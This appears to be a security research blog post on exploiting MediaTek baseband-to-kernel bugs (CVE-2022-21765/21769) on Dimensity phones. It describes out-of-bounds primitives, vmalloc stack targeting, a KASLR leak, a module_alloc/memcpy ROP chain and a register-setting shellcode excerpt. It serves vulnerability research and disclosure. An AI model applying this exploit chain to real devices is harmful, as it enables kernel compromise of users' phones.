
Full-Chain Attacks: A Look at Baseband Vulnerability Exploits - 2


Preface

In the Basebanheimer talk at Hardwear.io, a method was presented for achieving arbitrary code execution in the 32-bit Linux kernel of MediaTek's older Helio series chipsets by exploiting the MediaTek baseband pivot vulnerability CVE-2022-21765.

As discussed previously, this vulnerability should in theory also be exploitable on MediaTek's latest chipset series (Dimensity, which uses 64-bit cores).

Vulnerabilities: CVE-2022-21765 and CVE-2022-21769

To recap, these vulnerabilities provide OOB read and write primitives in the Linux kernel driver that interfaces the application processor (AP) with the cellular processor (CP), which MediaTek calls the CCCI driver. Specifically, the bugs stem from missing sanity checks on the offset and length values of the ring buffers stored in memory shared between the AP and CP. Here is the code in question:


At this point, however, we face several challenges, because the available OOB primitives are limited.

First, the maximum out-of-bounds reach is 2*UINT_MAX. Second, and most crucially, since we are corrupting the offsets the kernel uses for its own ring buffer operations, we have no direct control over:

  • Where the read operation reads into (i.e., the destination of the OOB-read "leak").
  • What the write operation writes (i.e., the value written).
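To make the bug class and the 2*UINT_MAX bound concrete, here is a hypothetical sketch (not MediaTek's actual CCCI code; the struct and function names are assumptions). If a 32-bit offset and a 32-bit length are both taken from shared memory and added to the buffer base in 64-bit arithmetic, the farthest reachable byte lies just under 2*UINT_MAX bytes past the base. Validating both values against the AP's own trusted copy of the capacity closes the hole.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical ring-buffer control block in AP/CP shared memory. The CP can
 * write these fields, so the AP must treat them as untrusted input. */
struct shm_ring {
    uint32_t read_off;   /* untrusted: controlled by the CP */
    uint32_t write_off;  /* untrusted: controlled by the CP */
};

/* One past the last byte touched by an unchecked copy of `len` bytes at
 * base + off. The offset and length are widened to 64 bits, so their sum
 * cannot wrap: its maximum is 2 * UINT32_MAX (UINT_MAX is 32 bits here). */
static uint64_t unchecked_end(uint64_t base, uint32_t off, uint32_t len)
{
    return base + (uint64_t)off + len;
}

/* Checked read: copy `len` bytes from the ring's read offset into `dst`,
 * wrapping at `cap`, the AP's own trusted copy of the buffer capacity.
 * Refuses instead of touching memory outside data[0..cap). */
static bool ring_read_checked(const struct shm_ring *r, const uint8_t *data,
                              uint32_t cap, uint8_t *dst, uint32_t len)
{
    uint32_t off = r->read_off;  /* snapshot once; a kernel driver would use READ_ONCE() */
    if (off >= cap || len > cap)
        return false;            /* the sanity check missing in this bug class */
    uint32_t first = cap - off;  /* bytes before the end of the buffer */
    if (first > len)
        first = len;
    memcpy(dst, data + off, first);
    memcpy(dst + first, data, len - first);  /* wrapped remainder, may be 0 bytes */
    return true;
}
```

With off = len = UINT32_MAX, the unchecked window ends 0x1fffffffe bytes (just under 8 GiB) past the base.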

Exploiting ioremap OOB errors in the Linux kernel

After finishing our Dimensity exploit development, we happened to see p0ly and Vincent Dehors' latest talk on their Tesla pwn. They demonstrated an interesting exploit chain whose last step cleverly exploits a very similar vulnerability in a similar way. It is an interesting example of how very different vendors end up handling the same problem in the same way.

Their approach shares Brandon Azad's original idea: target other allocations in the vmalloc region (these ring buffers are ioremap()ed, and ioremap() is served from the vmalloc region).

We also adopted Brandon's idea and targeted the _do_fork allocations.

This gives us a target to attack, but a few key questions still need to be addressed:

  • Can we convert the limited OOB R/W primitives into one with sufficient control over the written values?
  • How can we bypass KASLR?
  • Can we get a predictable vmalloc layout on the target to select suitable _do_fork victims?

Improving the OOB primitives of CVE-2022-21765/CVE-2022-21769

Most of the many ring buffers shared by the AP and CP are very noisy, which makes exploitation difficult.

Fortunately, we found that the ring buffer used only by the Remote File System (RemoteFS) implementation becomes very quiet after initial boot, so we can abuse it without worrying too much about breaking its normal operation.

More importantly, the RemoteFS API provides us with the ideal tools to transform out-of-bounds (OOB) primitives into almost fully controlled read and write operations:

  • To write to memory, we can first prepare the controlled data using RemoteFS's regular file write API.
  • We can then "read back" this data using the file read API and turn this into a write-what-where operation via the OOB write primitive (see the CVE-2022-21765 details).
  • We can also do the same in reverse to read arbitrary memory (read-from-where): corrupt the ring buffer while a file is being written so that the memory we want to leak is stored into the file, then read it back normally with the file read API.
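The read direction can be illustrated with a user-space toy model. Everything in it is hypothetical (the arena layout, the 16-byte ring, and the fs_write_unchecked and fs_read helpers): a "file write" handler that trusts the shared read offset stores whatever lies at that offset into the file, and a later ordinary file read hands it back.

```c
#include <stdint.h>
#include <string.h>

#define RING_CAP 16u

/* Toy layout (hypothetical): the ring's data area is immediately followed by
 * unrelated memory, modelled here as an 8-byte secret. */
struct arena {
    uint8_t ring[RING_CAP];
    uint8_t secret[8];
};

/* Hypothetical "file write" handler that, like the vulnerable driver, trusts
 * the shared read offset: it stores len bytes found at that offset into the
 * backing file. With read_off >= RING_CAP it copies whatever follows ring[].
 * In this toy the access stays inside struct arena, so the demo is well defined. */
static void fs_write_unchecked(const struct arena *a, uint32_t read_off,
                               uint8_t *file, uint32_t len)
{
    memcpy(file, (const uint8_t *)a + read_off, len);
}

/* Ordinary "file read": hands the stored bytes back unchanged. */
static void fs_read(const uint8_t *file, uint8_t *out, uint32_t len)
{
    memcpy(out, file, len);
}
```

Corrupting only the offset (here, setting it to RING_CAP) is enough to route the neighbouring bytes through the normal file path.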

When choosing where to write, we have to account for one limitation: the value written is not fully controlled, because each write to the ring buffer also includes a head and a tail, as shown in the following figure:


Therefore, we need to choose a corruption target that can tolerate the side effects of adjacent bytes being overwritten by head and tail "noise".
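One way to reason about this constraint is to check, for a candidate destination, whether the head and tail bytes land on anything that matters. The sketch below assumes a fixed 8-byte head and 4-byte tail (hypothetical sizes; the real CCCI framing may differ) and a caller-supplied "sensitive" byte range that must survive intact.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical frame layout: a HDR_LEN-byte head precedes the payload and a
 * TAIL_LEN-byte tail follows it. The real CCCI sizes may differ. */
#define HDR_LEN  8u
#define TAIL_LEN 4u

/* A byte range [start, end). */
struct range {
    uint64_t start, end;
};

static bool overlaps(struct range a, struct range b)
{
    return a.start < b.end && b.start < a.end;
}

/* True if writing `len` controlled bytes at `dst` keeps the head and tail
 * noise clear of `sensitive`. Only the noise is checked: the payload itself
 * is expected to land on the bytes we intend to corrupt. */
static bool noise_is_tolerable(uint64_t dst, uint64_t len, struct range sensitive)
{
    struct range head = { dst - HDR_LEN, dst };
    struct range tail = { dst + len, dst + len + TAIL_LEN };
    return !overlaps(head, sensitive) && !overlaps(tail, sensitive);
}
```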

Finding reliable Vmalloc victims and bypassing KASLR

During our research, we identified several potential targets, including thread stacks and BPF programs, all of which can be viewed in /proc/vmallocinfo.
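For reference, /proc/vmallocinfo lists one allocation per line (address range, size, allocating caller, then flags), and it is typically readable only by root. A minimal parser for spotting _do_fork thread stacks might look like this; the helper names are hypothetical and the sample line in the comment is illustrative, not captured from the target device.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* One parsed /proc/vmallocinfo entry (only the fields we need). */
struct vm_entry {
    uint64_t start, end;
    unsigned long size;
    char caller[128];
};

/* Parse a line such as (illustrative)
 *   "0xffffffc011a60000-0xffffffc011a65000   20480 _do_fork+0x84/0x3c8 pages=4 vmalloc"
 * Returns true if the range, size and caller were all read. */
static bool parse_vmallocinfo_line(const char *line, struct vm_entry *e)
{
    return sscanf(line, "0x%" SCNx64 "-0x%" SCNx64 " %lu %127s",
                  &e->start, &e->end, &e->size, e->caller) == 4;
}

/* True if the allocation was made from _do_fork, i.e. a thread stack. */
static bool is_do_fork_stack(const struct vm_entry *e)
{
    return strncmp(e->caller, "_do_fork+", 9) == 0;
}
```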

Although KASLR does not randomize vmalloc'ed addresses, the layout is not completely static because of the "natural" entropy introduced at runtime.

Still, early allocations follow a predictable and stable pattern. Because our ring buffer is allocated early in the life of the vmalloc region, it ends up at a predictable address, and the allocations adjacent to it can also be predicted with high accuracy.

Based on this, we can determine the locations of the _do_fork allocations in vmalloc.

To recap, the _do_fork allocations in the vmalloc region are kernel thread stacks. These stacks are used by user-space threads while executing system calls, and by kernel threads to hold their execution stacks.

Kernel threads in particular have fairly predictable call stacks, because the kernel spawns them in exactly the same way. As a result, the top of these stacks holds the same pushed frames: ret_from_fork, worker_thread, kthread, schedule, and so on.

Therefore, by overwriting the corresponding stack frame of a kernel thread that is waiting in schedule(), we can easily win the "race" against its rescheduling, hijack that thread's execution, and launch a ROP chain that executes custom code from there.

Additionally, choosing such a target gives us a direct path to bypassing KASLR. In our case, we found that relative to the RemoteFS ring buffer we could always find a kthread stack region holding a fixed pointer at offset +0x3eb8 (the same region we can target for the overwrite), which simplified leaking the KASLR slide of the kernel image.
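The slide arithmetic itself is simple. Assuming the leaked value is a pointer into the kernel image whose unslid address is known from the same vmlinux build (for example, a saved return address into kthread), the difference is the slide, and every other kernel-image address shifts by the same amount. The helper names below are hypothetical.

```c
#include <stdint.h>

/* KASLR slide = runtime address - link-time (unslid) address of the same
 * location. Assumes the leaked pointer points into the kernel image. */
static uint64_t kaslr_slide(uint64_t leaked, uint64_t static_addr)
{
    return leaked - static_addr;
}

/* Runtime address of any other kernel-image symbol, given its unslid
 * address and the slide computed above. */
static uint64_t rebase(uint64_t static_addr, uint64_t slide)
{
    return static_addr + slide;
}
```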

ROP chain for kernel RCE

p0ly and Vincent Dehors took the classic approach of overwriting a command string such as poweroff_cmd and then ROP-calling poweroff_work_func to execute it. This approach is efficient and clean, but has the limitation that the command can only be executed as root from a kworker context.

In the past this might have meant the successful end of the attack, but on today's Android systems SELinux places strict restrictions on such processes, making this approach practically useless.

Not even a shell can be connected back, because the process lacks permission to open network sockets. Therefore, against smartphones with MediaTek Dimensity chipsets, we needed a more powerful technique.

Brandon Azad's approach used ROP to reach ___bpf_prog_run() (the BPF interpreter), but this did not work for us because the MediaTek kernel rules this approach out.

Specifically, MediaTek Dimensity kernels enforce BPF JIT compilation, so the interpreter function is omitted from the kernel entirely:

static unsigned int ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn,
                    u64 *stack)
...
Instead, we looked at the BPF JIT implementation we did have. It turns out that always JIT-compiling eBPF programs means that module_alloc() (which simply allocates RWX memory for the caller) is present in the kernel. This, of course, is a perfect building block for a ROP chain leading to arbitrary shellcode.

void *module_alloc(unsigned long size)
{
  u64 module_alloc_end = module_alloc_base + MODULES_VSIZE;
  gfp_t gfp_mask = GFP_KERNEL;
  void *p;

  ...

  p = __vmalloc_node_range(size, MODULE_ALIGN, module_alloc_base,
        module_alloc_end, gfp_mask, PAGE_KERNEL_EXEC, 0,
        NUMA_NO_NODE, __builtin_return_address(0));
...

We still need gadgets to set up the register values for those ROP steps that require control over more than a single register.

One difficulty is that functions such as the Linux kernel's memcpy are often so heavily optimized that they do not use the stack at all (so their epilogue offers no convenient way to chain to the next ROP gadget). This is because they must be usable very early during boot, when the stack may not yet be initialized. Fortunately, there are wrappers around memcpy that do use the stack (such as copy_from_user; compare this to what was used in approach 3).

Finally, we can ROP into memcpy to copy the required shellcode from a reliably known, fixed address into the new RWX region. In our case, we were able to leverage our thread stack again, using the top of that _do_fork stack as the staging area.

Combining these steps into a ROP chain lets us execute completely arbitrary shellcode:

 1. set x0 = 0x100 (size of the injected code), x1 = <dummy>
 2. module_alloc(x0:size) -> x0:dst
 3. set x8 = x0
 4. set x0 = 0x100 (size of the injected code), x1 = <dummy>
 5. set x2 = x0
 6. set x0 = <dummy>, x1 = <code source>
 7. set x0 = x8
 8. memcpy(x0:dst, x1:src, x2:size) (preserves x0)
 9. set x8 = x0
10. jump to x8

Vulnerability Exploitation Demonstration

Finally, the link below is a video demonstration of exploiting the RCE vulnerability on a Dimensity chipset device (Xiaomi POCO M3 5G):

As shown in the video, for simplicity our proof of concept only executes shellcode that sets every register to a unique pattern, demonstrating successful code execution. The following excerpt is taken from the PoC source code:

const int shellcode_size = __SHELLCODE_SIZE__;
const ulong shellcode_addr = target_vmalloc + 0x1000;

uint shellcode[__SHELLCODE_SIZE__/4] = {
  0x00000000, // padding for exploit_write
  0xd2802020, // mov  x0, #0x101
  0xd2802221, // mov  x1, #0x111
  0xd2802422, // mov  x2, #0x121
  0xd2802623, // mov  x3, #0x131
  0xd2802824, // mov  x4, #0x141
  0xd2802a25, // mov  x5, #0x151
  0xd2802c26, // mov  x6, #0x161
  0xd2802e27, // mov  x7, #0x171
  0xd2803028, // mov  x8, #0x181
  (...)
  0xd280563a, // mov x26, #0x2b1
  0xd280583b, // mov x27, #0x2c1
  0xd2805a3c, // mov x28, #0x2d1
  0xd2805c3d, // mov x29, #0x2e1
  0xd2805e3e, // mov x30, #0x2f1
  0xd65f03c0, // ret
};
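Each word in the listing is an AArch64 instruction. The mov xN, #imm lines are the MOVZ alias (64-bit form, no shift), whose encoding is 0xd2800000 | imm16 << 5 | Rd. The small helper below (written for this explanation, not taken from the PoC) reproduces the listed words and can be used to check or extend the register pattern.

```c
#include <stdint.h>

/* Encode AArch64 "MOVZ Xd, #imm16" with hw = 0 (the `mov xN, #imm` alias).
 * Fields: sf=1, opc=10, 100101, hw(2 bits), imm16(16 bits), Rd(5 bits),
 * which gives the fixed base 0xd2800000. */
static uint32_t a64_movz_x(unsigned rd, uint16_t imm16)
{
    return 0xd2800000u | ((uint32_t)imm16 << 5) | (rd & 0x1fu);
}

/* RET (return to the address held in x30). */
static const uint32_t A64_RET = 0xd65f03c0u;
```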

Source: https://labs.taszk.io/articles/post/full_chain_bb_part3/